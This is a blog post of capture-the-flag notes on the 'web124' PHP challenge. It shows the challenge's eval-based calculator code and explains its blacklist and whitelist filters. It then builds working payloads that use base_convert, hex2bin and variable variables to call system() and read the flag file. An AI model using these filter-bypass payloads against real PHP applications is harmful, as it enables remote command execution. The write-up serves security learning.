web124笔记(数字变量转化) 

<?php

/*
# -*- coding: utf-8 -*-
# @Author: 收集自网络
# @Date:   2020-09-16 11:25:09
# @Last Modified by:   h1xa
# @Last Modified time: 2020-10-06 14:04:45

*/

error_reporting(0);
//听说你很喜欢数学,不知道你是否爱它胜过爱flag
if(!isset($_GET['c'])){
    show_source(__FILE__);
}else{
    //例子 c=20-1
    $content = $_GET['c'];
    if (strlen($content) >= 80) {
        die("太长了不会算");
    }
    $blacklist = [' ', '\t', '\r', '\n','\'', '"', '`', '\[', '\]'];
    foreach ($blacklist as $blackitem) {
        if (preg_match('/' . $blackitem . '/m', $content)) {
            die("请不要输入奇奇怪怪的字符");
        }
    }
    //常用数学函数http://www.w3school.com.cn/php/php_ref_math.asp
    $whitelist = ['abs', 'acos', 'acosh', 'asin', 'asinh', 'atan2', 'atan', 'atanh', 'base_convert', 'bindec', 'ceil', 'cos', 'cosh', 'decbin', 'dechex', 'decoct', 'deg2rad', 'exp', 'expm1', 'floor', 'fmod', 'getrandmax', 'hexdec', 'hypot', 'is_finite', 'is_infinite', 'is_nan', 'lcg_value', 'log10', 'log1p', 'log', 'max', 'min', 'mt_getrandmax', 'mt_rand', 'mt_srand', 'octdec', 'pi', 'pow', 'rad2deg', 'rand', 'round', 'sin', 'sinh', 'sqrt', 'srand', 'tan', 'tanh'];
    preg_match_all('/[a-zA-Z_\x7f-\xff][a-zA-Z_0-9\x7f-\xff]*/', $content, $used_funcs);  
    foreach ($used_funcs[0] as $func) {
        if (!in_array($func, $whitelist)) {
            die("请不要输入奇奇怪怪的函数");
        }
    }
    //帮你算出答案
    eval('echo '.$content.';');
}

这⾥想办法构造system('xxx')来执⾏任意命令

这段PHP代码的主要功能是接收一个GET参数c,并对其进行一系列的安全检查,最后通过eval函数执行该参数中的数学表达式并输出结果。以下是对代码的详细解读:

1. 错误报告设置
error_reporting(0);
这行代码关闭了所有的错误报告,防止在运行过程中显示任何错误信息。

2. 检查GET参数c
if(!isset($_GET['c'])){
    show_source(__FILE__);
}else{
如果没有接收到GET参数c,则显示当前文件的源代码(即__FILE__)。

如果接收到了c参数,则继续执行后续代码。

3. 检查输入长度
$content = $_GET['c'];
if (strlen($content) >= 80) {
    die("太长了不会算");
}
获取GET参数c的值,并检查其长度是否超过80个字符。

如果超过80个字符,则输出“太长了不会算”并终止程序。

4. 黑名单过滤
$blacklist = [' ', '\t', '\r', '\n','\'', '"', '`', '\[', '\]'];
foreach ($blacklist as $blackitem) {
    if (preg_match('/' . $blackitem . '/m', $content)) {
        die("请不要输入奇奇怪怪的字符");
    }
}
定义了一个黑名单数组$blacklist,包含了一些不允许出现的字符(如空格、制表符、换行符、引号等)。

使用preg_match函数检查$content中是否包含这些字符,如果包含则输出“请不要输入奇奇怪怪的字符”并终止程序。

5. 白名单过滤
$whitelist = ['abs', 'acos', 'acosh', 'asin', 'asinh', 'atan2', 'atan', 'atanh', 'base_convert', 'bindec', 'ceil', 'cos', 'cosh', 'decbin', 'dechex', 'decoct', 'deg2rad', 'exp', 'expm1', 'floor', 'fmod', 'getrandmax', 'hexdec', 'hypot', 'is_finite', 'is_infinite', 'is_nan', 'lcg_value', 'log10', 'log1p', 'log', 'max', 'min', 'mt_getrandmax', 'mt_rand', 'mt_srand', 'octdec', 'pi', 'pow', 'rad2deg', 'rand', 'round', 'sin', 'sinh', 'sqrt', 'srand', 'tan', 'tanh'];
preg_match_all('/[a-zA-Z_\x7f-\xff][a-zA-Z_0-9\x7f-\xff]*/', $content, $used_funcs);  
foreach ($used_funcs[0] as $func) {
    if (!in_array($func, $whitelist)) {
        die("请不要输入奇奇怪怪的函数");
    }
}
定义了一个白名单数组$whitelist,包含了一些允许使用的数学函数。

使用preg_match_all函数提取$content中的所有函数名,并检查这些函数是否在白名单中。

如果发现有不在白名单中的函数,则输出“请不要输入奇奇怪怪的函数”并终止程序。

6. 执行表达式
eval('echo '.$content.';');
最后,使用eval函数执行$content中的表达式,并输出结果。

eval函数会将传入的字符串作为PHP代码执行,因此这里可以执行数学表达式并输出结果。

可以向办法构造 $_GET[a]($_GET[b]) ,这样传⼊a=system&b=ls就能够执⾏命令了

payload

c=$pi=base_convert(37907361743,10,36)(dechex(1598506324));$$pi{sin}($$pi{cos})&sin=system&cos=tac flag.php

在线进制转换:https://tool.lu/hexconvert/

hex2bin的10进制为37907361743

dechex的作⽤是⼗进制转换为⼗六进制

_GET转16进制再转10进制的值为1598506324

hex2bin把⼗六进制的字符串转换为ASCII码

⽤pi当变量的原因是pi在⽩名单中,变量名只要在⽩名单中都可以,后⾯的sin和cos也是⼀样的

 

构造payload

c=$_GET[a]($_GET[b])&a=system&b=cat f*//这里运用可变函数的知识,详解文章放底下,这里的a,b都不是白名单的,需要替换成白名单的函数

$_GET[abs]($_GET[acos]) //strlen($content) >= 80,有长度限制,所以利用get命令执行

$_GET{abs}($_GET{acos}) //[]在黑名单,用{}代替

$pi=_GET;$$pi{abs}($$pi{acos})

进制转换

base_convert(number,frombase,tobase):在任意进制之间转换数字

number:规定要转换的数

frombase:规定数字原来的进制,介于2和36之间(包括 2 和 36)

tobase:规定要转换的进制,介于 2 和 36 之间(包括 2 和 36)

高于十进制的数字用字母a-z表示,如a表示10,b表示11以及z表示35

abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789$+-}{_><:?*.~/\空格//字符白名单

dechex():把十进制数转换为十六进制数

hex2bin():把十六进制值的字符串转换为二进制,返回 ASCII 字符

最重要的是hex2bin函数,但是不在白名单里面

base_convert构造hex2bin

base_convert('hex2bin',36,10) → 37907361743

构造出_GET

_GET → hex十六进制 5f474554 (不能有字母所以十六进制不行) → dec十进制 1598506324 (在线转换)

所以_GET可以写为

hex2bin(dechex(1598506324))

base_convert('37907361743',10,36)(dechex(1598506324))

最后的payload

?c=$pi=base_convert(37907361743,10,36)(dechex(1598506324));$$pi{abs}($$pi{acos})&abs=system&acos=ls

?c=$pi=base_convert(37907361743,10,36)(dechex(1598506324));$$pi{abs}($$pi{acos})&abs=system&acos=tac flag.*

 

posted @ 2025-03-17 21:23  justdoIT*  阅读(11)  评论(0)    收藏  举报